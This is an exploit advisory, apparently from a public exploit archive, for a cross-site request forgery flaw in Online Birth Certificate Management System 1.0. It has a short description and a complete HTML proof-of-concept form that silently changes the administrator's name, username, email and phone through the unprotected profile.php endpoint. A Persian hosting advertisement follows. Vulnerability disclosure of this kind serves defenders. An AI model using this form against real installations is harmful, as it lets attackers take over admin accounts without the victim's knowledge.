Online Birth Certificate Management System 1.0 Cross Site Request Forgery
- Online Birth Certificate Management System 1.0 Cross Site Request Forgery
- Posted Sep 27, 2022
- Authored by Yousef Alraddadi
- Online Birth Certificate Management System version 1.0 suffers from a cross site request forgery vulnerability.
- SHA-256 |
f90076f01c3d533b4fccbc2387bf165114d9246cfe28d87c6be0ae171a022afe - Download | Favorite | View
# Exploit Title: Online Birth Certificate Management System - Cross Site Request Forgery (CSRF)
# Google Dork: N/A
# Date: 2022-9-27
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0# no token in update profile admin
<html>
<head>
<title> CSRF update Profile </title>
</head>
<body>
<form action=”http://localhost/OBCMS/admin/profile.php” method=”post” enctype=”multipart/form-data”>
<input type=”hidden” name=”adminname” value=”csrf111″>
<input type=”hidden” name=”username” value=”csrf”>
<input type=”hidden” name=”email” value=”csrf”>
<input type=”hidden” name=”mobilenumber” value=”0″>
<button class=”btn btn-sm btn-primary login-submit-cs” type=”submit” name=”submit”>Save Change</button>
</form>
</body>
</html>
نیاز به مدیریت سرور دارید؟
تیم آفاق هاستینگ خدمات نصب، پیکربندی، امنیت، مانیتورینگ و نگهداری سرورهای لینوکسی و ویندوزی را ارائه میدهد.
مشاهده خدمات مدیریت سرور